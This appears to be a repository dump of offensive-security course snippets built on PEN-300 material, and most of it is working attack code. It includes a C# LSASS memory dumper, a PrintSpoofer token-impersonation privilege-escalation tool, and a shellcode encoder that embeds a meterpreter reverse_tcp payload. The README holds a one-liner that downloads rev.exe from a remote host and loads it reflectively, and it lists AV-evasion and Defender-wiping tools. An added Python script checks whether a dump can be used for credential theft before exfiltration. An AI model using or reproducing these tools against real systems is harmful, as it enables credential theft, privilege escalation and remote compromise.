    Write-Host("Dumped LSASS memory to $filePath.")
}else {
    Write-Host("Error dumping LSASS memory.")
}
--------------------------------------------------------------------------------
/MiniDump/MiniDump.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MiniDump", "MiniDump.csproj", "{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|x64 = Debug|x64
		Release|Any CPU = Release|Any CPU
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.ActiveCfg = Debug|x64
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.Build.0 = Debug|x64
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.Build.0 = Release|Any CPU
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.ActiveCfg = Release|x64
		{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {32D0848B-922D-49BC-8B90-2F98D24BA0DD}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/MiniDump/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace MiniDump
{
    public class Program
    {
        // MINIDUMP_TYPE passed to MiniDumpWriteDump: include all readable memory of the process
        static int MiniDumpWithFullMemory = 2;
        static UInt32 PROCESS_ALL_ACCESS = 0x001F0FFF;

        // SetLastError is required for Marshal.GetLastWin32Error() below to report the real cause
        [DllImport("Dbghelp.dll", SetLastError = true)]
        static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

        public static void Main(string[] args)
        {
            // Get the PID of lsass.exe
            Process[] lsass = Process.GetProcessesByName("lsass");
            if (lsass.Length == 0)
            {
                Console.WriteLine("lsass.exe not found.");
                return;
            }
            int lsass_pid = lsass[0].Id;
            Console.WriteLine($"Got lsass.exe PID: {lsass_pid}.");

            // Get a handle on LSASS. This needs an elevated token holding SeDebugPrivilege;
            // PROCESS_QUERY_INFORMATION | PROCESS_VM_READ would be enough for the dump itself.
            IntPtr handle = OpenProcess(PROCESS_ALL_ACCESS, false, lsass_pid);
            if (handle == IntPtr.Zero)
            {
                Console.WriteLine($"OpenProcess failed: {Marshal.GetLastWin32Error()}");
                return;
            }
            Console.WriteLine($"Got a handle on lsass.exe: {handle}.");

            // Dump LSASS process to file
            string filePath = "C:\\Windows\\tasks\\lsass.dmp";
            using (FileStream dumpFile = new FileStream(filePath, FileMode.Create))
            {
                bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
                if (dumped)
                {
                    Console.WriteLine($"Dumped LSASS memory to {filePath}.");
                }
                else
                {
                    Console.WriteLine($"Error dumping LSASS memory: {Marshal.GetLastWin32Error()}");
                }
            }
        }
    }
}
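Both MiniDump variants above pass dump type 2 (MiniDumpWithFullMemory) to MiniDumpWriteDump. Before moving the resulting file off the host it is worth checking that it really is a full-memory dump, because a partial one (wrong flags, or a missing Memory64ListStream) is useless to credential parsers and not worth the exfiltration noise. The parser below is an added example, not part of the OSEP snippets: it reads the MINIDUMP_HEADER and the MINIDUMP_DIRECTORY entries (layouts as in dbghelp.h) and reports the flag and the streams. The sample file is constructed in build_sample_dump(); it has a correct header and directory but no real memory contents.

```python
"""Parse a minidump's header and stream directory and decide whether it is usable."""
import struct

MDMP_SIGNATURE = 0x504D444D        # the bytes 'MDMP' read as a little-endian DWORD
MINIDUMP_VERSION = 0xA793          # low word of MINIDUMP_HEADER.Version
MINIDUMP_WITH_FULL_MEMORY = 0x2    # MINIDUMP_TYPE flag that dump type 2 sets

# MINIDUMP_STREAM_TYPE values that matter here
STREAM_TYPES = {
    3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
    7: "SystemInfoStream", 9: "Memory64ListStream", 15: "MiscInfoStream",
    16: "MemoryInfoListStream",
}
# Full-memory dumps keep their memory in Memory64ListStream; parsers also need SystemInfo and ModuleList
REQUIRED_FOR_CREDS = {"SystemInfoStream", "ModuleListStream", "Memory64ListStream"}

# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER_FMT = "<IIIIIIQ"
# MINIDUMP_DIRECTORY: StreamType, Location.DataSize, Location.Rva
DIR_FMT = "<III"
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 32
DIR_SIZE = struct.calcsize(DIR_FMT)        # 12


def parse_minidump(data):
    """Parse the header and stream directory; raise ValueError on anything malformed."""
    if len(data) < HEADER_SIZE:
        raise ValueError("file shorter than MINIDUMP_HEADER")
    sig, version, nstreams, dir_rva, _checksum, timestamp, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("bad signature: not a minidump")
    if (version & 0xFFFF) != MINIDUMP_VERSION:
        raise ValueError("unexpected minidump version word")
    if dir_rva + nstreams * DIR_SIZE > len(data):
        raise ValueError("stream directory runs past end of file")
    streams = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIR_FMT, data, dir_rva + i * DIR_SIZE)
        streams.append({"type": STREAM_TYPES.get(stype, f"Unknown({stype})"), "size": size, "rva": rva})
    return {
        "timestamp": timestamp,
        "flags": flags,
        "full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY),
        "streams": streams,
    }


def dump_is_usable(info):
    """Return (ok, reasons): ok when the full-memory flag is set and the required streams exist."""
    reasons = []
    if not info["full_memory"]:
        reasons.append("MiniDumpWithFullMemory flag not set")
    present = {s["type"] for s in info["streams"]}
    for name in sorted(REQUIRED_FOR_CREDS - present):
        reasons.append(f"missing {name}")
    return (not reasons, reasons)


def build_sample_dump(flags=MINIDUMP_WITH_FULL_MEMORY, stream_types=(7, 3, 4, 9)):
    """Constructed sample: valid header and directory, every stream empty (DataSize 0)."""
    nstreams = len(stream_types)
    dir_rva = HEADER_SIZE
    body_rva = dir_rva + nstreams * DIR_SIZE
    # The high word of Version is implementation-specific (zero here); TimeDateStamp is arbitrary
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, MINIDUMP_VERSION, nstreams, dir_rva, 0, 1614600000, flags)
    directory = b"".join(struct.pack(DIR_FMT, st, 0, body_rva) for st in stream_types)
    return header + directory


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    info = parse_minidump(data)
    ok, reasons = dump_is_usable(info)
    print(f"full memory: {info['full_memory']}, streams: {[s['type'] for s in info['streams']]}")
    print("usable" if ok else "not usable: " + "; ".join(reasons))
```

Run it with the path to `lsass.dmp` as the only argument; with no argument it checks the constructed sample. A dump written by the code above should report the full-memory flag and all three required streams.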
--------------------------------------------------------------------------------
/MiniDump/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("MiniDump")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("MiniDump")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("595d5812-aa30-4ede-95da-8edd7b8844bd")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/PrintSpoofer.NET/App.config:
--------------------------------------------------------------------------------
(.NET Framework startup configuration for the PrintSpoofer project; the XML markup was lost in extraction.)
--------------------------------------------------------------------------------
/PrintSpoofer.NET/PrintSpoofer.csproj:
--------------------------------------------------------------------------------
(Visual Studio C# project file; the XML markup was lost in extraction. Recoverable settings: OutputType Exe, RootNamespace and AssemblyName PrintSpoofer, TargetFrameworkVersion v4.7.2, ProjectGuid {C91C8B29-82DF-49C0-986B-81182CF84E42}, Debug and Release configurations for AnyCPU and for x64 (the x64 ones with LangVersion 7.3).)
--------------------------------------------------------------------------------
/PrintSpoofer.NET/PrintSpoofer.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrintSpoofer", "PrintSpoofer.csproj", "{C91C8B29-82DF-49C0-986B-81182CF84E42}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|x64 = Debug|x64
		Release|Any CPU = Release|Any CPU
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.ActiveCfg = Debug|x64
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.Build.0 = Debug|x64
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.Build.0 = Release|Any CPU
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.ActiveCfg = Release|x64
		{C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {4312EA9E-E161-4B69-A14B-2377CB32213A}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/PrintSpoofer.NET/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Text;

namespace PrintSpoofer
{
    public class Program
    {
        public static uint PIPE_ACCESS_DUPLEX = 0x3;
        public static uint PIPE_TYPE_BYTE = 0x0;
        public static uint PIPE_WAIT = 0x0;
        public static uint TOKEN_ALL_ACCESS = 0xF01FF;
        public static uint TOKENUSER = 1;
        public static uint SECURITY_IMPERSONATION = 2;   // SECURITY_IMPERSONATION_LEVEL: SecurityImpersonation
        public static uint TOKEN_PRIMARY = 1;            // TOKEN_TYPE: TokenPrimary, required by CreateProcessWithTokenW

        [StructLayout(LayoutKind.Sequential)]
        public struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public int dwProcessId;
            public int dwThreadId;
        }
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct STARTUPINFO
        {
            public Int32 cb;
            public string lpReserved;
            public string lpDesktop;
            public string lpTitle;
            public Int32 dwX;
            public Int32 dwY;
            public Int32 dwXSize;
            public Int32 dwYSize;
            public Int32 dwXCountChars;
            public Int32 dwYCountChars;
            public Int32 dwFillAttribute;
            public Int32 dwFlags;
            public Int16 wShowWindow;
            public Int16 cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        public enum CreationFlags
        {
            DefaultErrorMode = 0x04000000,
            NewConsole = 0x00000010,
            NewProcessGroup = 0x00000200,
            SeparateWOWVDM = 0x00000800,
            Suspended = 0x00000004,
            UnicodeEnvironment = 0x00000400,
            ExtendedStartupInfoPresent = 0x00080000
        }
        public enum LogonFlags
        {
            WithProfile = 1,
            NetCredentialsOnly
        }

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateNamedPipe(string lpName, uint dwOpenMode, uint dwPipeMode, uint nMaxInstances, uint nOutBufferSize, uint nInBufferSize, uint nDefaultTimeOut, IntPtr lpSecurityAttributes);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool ConnectNamedPipe(IntPtr hNamedPipe, IntPtr lpOverlapped);

        [DllImport("Advapi32.dll", SetLastError = true)]
        static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);

        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);

        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentThread();

        [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
        public static extern bool CreateProcessWithTokenW(IntPtr hToken, LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

        [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);

        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool RevertToSelf();

        [DllImport("kernel32.dll")]
        static extern uint GetSystemDirectory([Out] StringBuilder lpBuffer, uint uSize);

        [DllImport("userenv.dll", SetLastError = true)]
        static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);

        public static void Main(string[] args)
        {
            // Parse arguments (pipe name and binary to run)
            if (args.Length != 2)
            {
                Console.WriteLine("Please enter the pipe name to be used and the binary to trigger as arguments.\nExample: .\\PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\windows\\tasks\\bin.exe");
                return;
            }
            string pipeName = args[0];
            string binToRun = args[1];

            // Create our named pipe. The spooler connects to <pipe>\pipe\spoolss, so the name
            // given on the command line must end in that suffix (see the example above).
            IntPtr hPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 10, 0x1000, 0x1000, 0, IntPtr.Zero);
            if (hPipe == new IntPtr(-1))   // INVALID_HANDLE_VALUE
            {
                Console.WriteLine($"CreateNamedPipe failed: {Marshal.GetLastWin32Error()}");
                return;
            }

            // Block until a client connects; the spooler is triggered separately (e.g. with SpoolSample)
            Console.WriteLine("Waiting for client to connect to named pipe...");
            bool result = ConnectNamedPipe(hPipe, IntPtr.Zero);

            // Impersonate the token of the incoming connection (needs SeImpersonatePrivilege)
            result = ImpersonateNamedPipeClient(hPipe);
            if (!result)
            {
                Console.WriteLine($"ImpersonateNamedPipeClient failed: {Marshal.GetLastWin32Error()}");
                return;
            }

            // Open a handle on the impersonated token
            IntPtr tokenHandle;
            result = OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, false, out tokenHandle);
            if (!result)
            {
                Console.WriteLine($"OpenThreadToken failed: {Marshal.GetLastWin32Error()}");
                return;
            }

            // Duplicate the stolen token into a primary token, which process creation requires
            IntPtr sysToken = IntPtr.Zero;
            DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, IntPtr.Zero, SECURITY_IMPERSONATION, TOKEN_PRIMARY, out sysToken);

            // Create an environment block for the non-interactive session
            IntPtr env = IntPtr.Zero;
            bool res = CreateEnvironmentBlock(out env, sysToken, false);

            // Show who we are impersonating, then drop the impersonation: CreateProcessWithTokenW
            // is called under our own identity (which holds SeImpersonatePrivilege) with the duplicated token
            String name = WindowsIdentity.GetCurrent().Name;
            Console.WriteLine($"Impersonated user is: {name}.");
            RevertToSelf();

            // Get the system directory
            StringBuilder sbSystemDir = new StringBuilder(256);
            uint res1 = GetSystemDirectory(sbSystemDir, 256);

            // Spawn a new process with the duplicated token, a desktop session, and the created profile
            PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
            STARTUPINFO sInfo = new STARTUPINFO();
            sInfo.cb = Marshal.SizeOf(sInfo);
            sInfo.lpDesktop = "WinSta0\\Default";
            bool created = CreateProcessWithTokenW(sysToken, LogonFlags.WithProfile, null, binToRun, CreationFlags.UnicodeEnvironment, env, sbSystemDir.ToString(), ref sInfo, out pInfo);
            if (created)
            {
                Console.WriteLine($"Executed '{binToRun}' with impersonated token (PID {pInfo.dwProcessId}).");
            }
            else
            {
                Console.WriteLine($"CreateProcessWithTokenW failed: {Marshal.GetLastWin32Error()}");
            }
        }
    }
}
--------------------------------------------------------------------------------
/PrintSpoofer.NET/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("PrintSpoofer.NET")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("PrintSpoofer.NET")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("c91c8b29-82df-49c0-986b-81182cf84e42")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSEP Code Snippets
Code examples are provided as-is, without any form of warranty. Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course.

Classes and methods are public, so most binaries should allow for reflective loading as below.

```powershell
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main("".Split())
```

### Contents
|Snippet Name|Description|
|--|--|
| AppLocker Bypass PowerShell Runspace (C#) | Base binary for an AppLocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.|
| Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. |
|Linux Shellcode Encoder (Python) | A utility script to encode C# payloads from Linux, automatically feeding from `msfvenom`. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.|
|Linux Shellcode Loaders (C) |Various C-based shellcode loaders, including base binaries for library hijacking.|
|MiniDump (C# & PS1) |A simple binary to dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as a native PowerShell script.|
|MSSQL (C#)|An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|
|PrintSpoofer.NET (C#)|Steals the token of the incoming authentication forced with the [PrintSpooler exploit](https://github.com/leechristensen/SpoolSample), and uses that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.|
|ROT Shellcode Encoder (C#)|A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.|
|Sections Shellcode Process Injector (C#)|Injects and runs shellcode using `NtCreateSection`, `NtMapViewOfSection`, `NtUnmapViewOfSection` and `NtClose` instead of the "standard" method.|
|Shellcode Process Hollowing (C#)|Hollows a `svchost` process and runs the shellcode from there. Scores 0/68 on VirusTotal at the time of writing.|
|Shellcode Process Injector (C# & PS1) | Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as a native PowerShell script (though it is a bit simpler).|
|Simple Shellcode Runner (C# & PS1 & VBA)|The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.|
|XOR Shellcode Encoder (C#)|A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.|

--------------------------------------------------------------------------------
/ROT Shellcode Encoder/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ConsoleApp2
{
    class Program
    {
        static void Main(string[] args)
        {
            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f csharp
            byte[] buf = new byte[511] {
                0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
                0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,
                0x52,0x20,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,
                0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
                0x01,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,
                0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
                0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x44,0x8b,
                0x40,0x20,0x49,0x01,0xd0,0x50,0x8b,0x48,0x18,0xe3,0x56,0x4d,0x31,0xc9,0x48,
                0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
                0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
                0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
                0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
                0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
                0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
                0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,
                0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,
                0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,
                0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
                0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
                0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,
                0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
                0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
                0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,
                0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,
                0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
                0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
                0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,
                0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,
                0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,
                0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
                0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
                0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,
                0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,
                0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,
                0xd5 };

            if (args.Length == 0)
            {
                System.Console.WriteLine("Please enter a numeric argument for the number of rotations.");
                return;
            }

            int rotNo = int.Parse(args[0]);

            // Encode the payload with rotation
            byte[] encoded = new byte[buf.Length];
            for (int i = 0; i < buf.Length; i++)
            {
                encoded[i] = (byte)(((uint)buf[i] + rotNo) & 0xFF);
            }

            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            int totalCount = encoded.Length;
            for (int count = 0; count < totalCount; count++)
            {
                byte b = encoded[count];

                if ((count + 1) == totalCount) // Don't append a comma for the last item
                {
                    hex.AppendFormat("0x{0:x2}", b);
                }
                else
                {
                    hex.AppendFormat("0x{0:x2}, ", b);
                }
            }

            Console.WriteLine($"ROT{rotNo} payload:");
            Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{ {hex} }};");

            //// Decode the ROTxx payload (make sure to change rotations)
            // for (int i = 0; i < buf.Length; i++)
            // {
            //     buf[i] = (byte)(((uint)buf[i] - 37) & 0xFF);
            //}

        }
    }
}
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ROT Shellcode Encoder")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ROT Shellcode Encoder")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("59224c16-39c5-49ea-8525-f493dc1d66fe")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/ROT Shellcode Encoder.csproj:
--------------------------------------------------------------------------------
Debug
AnyCPU
{59224C16-39C5-49EA-8525-F493DC1D66FE}
Exe
ROT_Shellcode_Encoder
ROT Shellcode Encoder
v4.7.2
512
true
true

AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4

AnyCPU
pdbonly
true
bin\Release\
TRACE
prompt
4
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/ROT Shellcode Encoder.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
